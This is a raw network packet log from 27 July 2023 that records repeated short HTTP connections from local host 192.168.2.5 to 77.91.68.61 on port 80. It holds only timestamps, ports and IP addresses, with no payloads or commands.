Jul 27, 2023 01:34:53.486228943 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.595037937 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.595752954 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.639981985 CEST	80	50145	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.640630960 CEST	80	50146	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.640707016 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.640748978 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.642091990 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.686830997 CEST	80	50146	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.689990997 CEST	80	50146	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.690923929 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.799207926 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.800029993 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.844480991 CEST	80	50146	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.845297098 CEST	80	50147	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.845396042 CEST	50146	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.845437050 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.855014086 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.900413990 CEST	80	50147	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.962312937 CEST	80	50147	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.962430954 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.072364092 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.073242903 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.117243052 CEST	80	50148	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.117250919 CEST	80	50147	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.117384911 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.117388010 CEST	50147	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.118880987 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.163705111 CEST	80	50148	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.168329954 CEST	80	50148	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.169009924 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.285445929 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.286329985 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.331463099 CEST	80	50148	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.331568956 CEST	50148	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.332427979 CEST	80	50149	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.332523108 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.332918882 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.378434896 CEST	80	50149	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.382750988 CEST	80	50149	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.382831097 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.502280951 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.503076077 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.547049999 CEST	80	50149	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.547204971 CEST	50149	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.547219992 CEST	80	50150	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.548423052 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.548800945 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.594708920 CEST	80	50150	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.599266052 CEST	80	50150	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.599350929 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.704176903 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.705013990 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.750103951 CEST	80	50150	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.750175953 CEST	50150	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.750507116 CEST	80	50151	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.750607014 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.751408100 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.796154022 CEST	80	50151	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.799952984 CEST	80	50151	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.800019026 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.934734106 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.936876059 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.979929924 CEST	80	50151	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.980115891 CEST	50151	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.982203960 CEST	80	50152	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:54.982300043 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:54.982754946 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.027510881 CEST	80	50152	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.031346083 CEST	80	50152	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.031440020 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.156486988 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.157666922 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.201729059 CEST	80	50152	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.201843977 CEST	50152	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.203553915 CEST	80	50153	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.203674078 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.204678059 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.250530958 CEST	80	50153	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.253741026 CEST	80	50153	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.253910065 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.375006914 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.378504992 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.421160936 CEST	80	50153	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.421241999 CEST	50153	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.424072027 CEST	80	50154	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.424161911 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.432231903 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.477324009 CEST	80	50154	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.482249022 CEST	80	50154	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.482333899 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.598627090 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.599519968 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.644315958 CEST	80	50154	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.644526005 CEST	50154	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.645024061 CEST	80	50155	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.645237923 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.688940048 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.734565973 CEST	80	50155	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.738440990 CEST	80	50155	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.738528967 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.850842953 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.851500988 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.896192074 CEST	80	50155	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.896291018 CEST	50155	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.897228003 CEST	80	50156	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.898128986 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.902545929 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:55.949202061 CEST	80	50156	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.953798056 CEST	80	50156	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:55.953913927 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.124634981 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.125528097 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.170856953 CEST	80	50156	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.170897007 CEST	80	50157	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.170954943 CEST	50156	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.171040058 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.176512957 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.222666979 CEST	80	50157	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.226625919 CEST	80	50157	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.226742983 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.345257998 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.346529007 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.391340971 CEST	80	50157	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.391428947 CEST	50157	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.392002106 CEST	80	50158	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.392143011 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.392754078 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.438126087 CEST	80	50158	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.443641901 CEST	80	50158	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.443783998 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.550296068 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.551259995 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.595361948 CEST	80	50158	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.595496893 CEST	50158	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.595565081 CEST	80	50159	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.595664978 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.629968882 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.674923897 CEST	80	50159	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.678792953 CEST	80	50159	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.679748058 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.783380032 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.783984900 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.827595949 CEST	80	50159	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.827714920 CEST	50159	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.828135967 CEST	80	50160	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.828236103 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.837090969 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:56.881186008 CEST	80	50160	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.885212898 CEST	80	50160	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:56.885891914 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.027721882 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.029838085 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.071657896 CEST	80	50160	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.071736097 CEST	50160	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.074872971 CEST	80	50161	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.074975014 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.079936028 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.125157118 CEST	80	50161	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.129601002 CEST	80	50161	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.131885052 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.236185074 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.237437963 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.280879974 CEST	80	50161	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.280997992 CEST	50161	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.281560898 CEST	80	50162	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.281759977 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.344120979 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.388545990 CEST	80	50162	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.391685009 CEST	80	50162	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.392311096 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.507744074 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.508542061 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.552129984 CEST	80	50162	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.552216053 CEST	50162	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.552352905 CEST	80	50163	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.552442074 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.561216116 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.605283022 CEST	80	50163	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.609436035 CEST	80	50163	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.613284111 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.757242918 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.758141041 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.801394939 CEST	80	50163	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.801506042 CEST	50163	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.802195072 CEST	80	50164	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.803385019 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.804349899 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:57.848567009 CEST	80	50164	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.852195978 CEST	80	50164	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:57.852332115 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.022695065 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.023554087 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.066932917 CEST	80	50164	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.067135096 CEST	50164	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.069715977 CEST	80	50165	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.069849014 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.071989059 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.117360115 CEST	80	50165	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.179699898 CEST	80	50165	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.179807901 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.306612015 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.333307981 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.357089043 CEST	80	50165	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.357930899 CEST	50165	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.379976988 CEST	80	50166	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.380227089 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.380558968 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.426909924 CEST	80	50166	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.431196928 CEST	80	50166	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.431370020 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.535815954 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.536650896 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.581392050 CEST	80	50166	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.582638025 CEST	80	50167	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.582722902 CEST	50166	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.582770109 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.583519936 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.629065037 CEST	80	50167	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.633646965 CEST	80	50167	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.634715080 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.751322031 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.751945019 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.796588898 CEST	80	50168	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.796704054 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.798052073 CEST	80	50167	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.798163891 CEST	50167	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.801565886 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.845935106 CEST	80	50168	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.850380898 CEST	80	50168	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:58.850502014 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.970136881 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:58.970817089 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.014753103 CEST	80	50168	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.015242100 CEST	80	50169	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.015353918 CEST	50168	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.015419960 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.053643942 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.097830057 CEST	80	50169	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.102142096 CEST	80	50169	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.102258921 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.213088036 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.214041948 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.257776022 CEST	80	50169	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.257935047 CEST	50169	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.258708954 CEST	80	50170	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.258832932 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.268022060 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.312104940 CEST	80	50170	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.315963030 CEST	80	50170	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.317521095 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.447824001 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.448798895 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.493993044 CEST	80	50170	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.494473934 CEST	50170	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.495151997 CEST	80	50171	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.496893883 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.498482943 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.543626070 CEST	80	50171	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.547661066 CEST	80	50171	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.547776937 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.751195908 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.752384901 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.795948982 CEST	80	50171	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.796036959 CEST	50171	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.797091007 CEST	80	50172	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.797274113 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.799813032 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.846668005 CEST	80	50172	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.851345062 CEST	80	50172	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:59.851505995 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.955137014 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:59.956074953 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.001763105 CEST	80	50173	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.002357006 CEST	80	50172	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.002506018 CEST	50172	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.004681110 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.007693052 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.052572966 CEST	80	50173	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.057920933 CEST	80	50173	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.060884953 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.197453976 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.198638916 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.246187925 CEST	80	50173	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.246226072 CEST	80	50174	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.246315956 CEST	50173	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.246340990 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.249025106 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.293406010 CEST	80	50174	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.297267914 CEST	80	50174	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.298563957 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.448438883 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.484153986 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.493593931 CEST	80	50174	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.493695021 CEST	50174	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.529629946 CEST	80	50175	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.533023119 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.536084890 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.581286907 CEST	80	50175	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.586014986 CEST	80	50175	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.586098909 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.689477921 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.696065903 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.736933947 CEST	80	50175	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.737010002 CEST	50175	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.741960049 CEST	80	50176	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.742111921 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.754386902 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.798978090 CEST	80	50176	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.802856922 CEST	80	50176	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.803145885 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.908329010 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.909931898 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.952825069 CEST	80	50176	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.952914000 CEST	50176	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.954036951 CEST	80	50177	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:00.954174042 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:00.956306934 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.000302076 CEST	80	50177	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.004926920 CEST	80	50177	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.004992962 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.132587910 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.133527994 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.176743031 CEST	80	50177	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.176918983 CEST	50177	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.178134918 CEST	80	50178	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.178284883 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.183969021 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.228688955 CEST	80	50178	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.232585907 CEST	80	50178	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:01.232692003 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.346648932 CEST	50178	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:01.347507000 CEST	50179	80	192.168.2.5	77.91.68.61
